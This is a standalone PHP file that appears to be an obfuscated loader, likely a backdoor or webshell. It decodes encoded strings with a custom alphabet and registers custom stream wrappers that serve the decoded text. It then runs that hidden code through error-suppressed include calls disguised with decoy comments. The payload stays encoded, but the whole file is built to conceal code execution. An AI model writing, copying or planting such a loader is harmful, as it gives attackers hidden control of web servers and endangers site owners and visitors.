<?php
$handler = function(){
    $info = 'M8ZzkBuJ90KiyIf14pERNvxwhHsX7oC5UlAVFqaDrgPGOQTSeb6Y2Lt3jdnWmc';
    function event($s, $m) {
        $s = strval($s);
        $flip = array_flip(str_split($m));
        $len = strlen($s);
        $bin = "";
        for($i = 0; $i < $len; $i++) {
            $n = ($flip[$s[$i]] - ($i % 2)) / 4;
            $b = decbin($n);
            $bin .= str_pad($b, 4, '0', STR_PAD_LEFT);
        }
        $out = "";
        $chunks = str_split($bin, 8);
        foreach($chunks as $chunk) {
            $out .= chr(bindec($chunk));
        }
        return $out;
    }
    $rho = array(
        "nu" => 'ybyc78hl7898hqhH9lhLhpyv9l9pNcNI4vN0NH4vN0NQ9o4lNpNpN8NcNvNI4vN0Nc4B4o4v4dNp9oNL9q9ByLyL9oypyByoyoy8hvypy8ylhpypyvyIhHy8hvyBylh0yHhIhHyvyIyvhvy0y0y8hIylyp9o9q7QhvhIhlhc989ohv7070hc709oyQhv7lhq7p9l9qyQ7L',
        "cache" => 'ybyc78hl7898489p78hc7I7pyLh0hB7IhvyHypNchphvhIhchphv9l9pNcN84cNINpNQ9o7I7vh09oNL9qyQ9phQhv7qyL9pNc4I4c4c4Q4q4vNQ9oN84lN8NI4vNINI4q4p9oNLyQhHhc709l9phqyLy8yQ9phqyb7I7p70hbhvhd9l9p78hc7I7p9qyQ9phq9Q9Q9q7Q9p78hc7I7pNQ9phqNLyL9p78hc7I7pNQ9phqNLNd9phQhv7qNQ9phq9vy0yHNLyQ7Lhv7HhBhb9l9p78hc7I7p9qyQ',
        "store" => 'hbhqhdhQyg9c9chp7vhLhL7q',
        "lambda" => '7phlhq707phvhvhdyg9c9chp7vhLhL7q'
    );
    $twenty = event($rho["nu"], $info);
    $GLOBALS['process'] = $twenty;
    if(!in_array("link", stream_get_wrappers())) {
        class upsilon {
            private $pos;
            public function stream_open($path, $mode, $options, &$opened_path) {
                $this->pos = 0;
                return true;
            }
            public function stream_read($count) {
                $seventeen = $GLOBALS['process'];
                $ret = substr($seventeen, $this->pos, $count);
                $this->pos += strlen($ret);
                return $ret;
            }
            public function stream_eof() {
                $seventeen = $GLOBALS['process'];
                return $this->pos >= strlen($seventeen);
            }
            public function stream_stat() {
                return array();
            }
        }
        stream_wrapper_register("link", "upsilon");
    }
    $unit = event($rho["store"], $info);
    @include/*****bit*****mu*****/($unit)."/*****alpha*****/";
    unset($GLOBALS['process']);
    $omega = event($rho["cache"], $info);
    $GLOBALS['field'] = $omega;
    if(!in_array("thirteen", stream_get_wrappers())) {
        class pi {
            private $pos;
            public function stream_open($path, $mode, $options, &$opened_path) {
                $this->pos = 0;
                return true;
            }
            public function stream_read($count) {
                $iota = $GLOBALS['field'];
                $ret = substr($iota, $this->pos, $count);
                $this->pos += strlen($ret);
                return $ret;
            }
            public function stream_eof() {
                $iota = $GLOBALS['field'];
                return $this->pos >= strlen($iota);
            }
            public function stream_stat() {
                return array();
            }
        }
        stream_wrapper_register("thirteen", "pi");
    }
    $chi = event($rho["lambda"], $info);
    @include/*****chain*****phi*****/($chi)."/*****node*****/";
    unset($GLOBALS['field']);
}; 
$handler();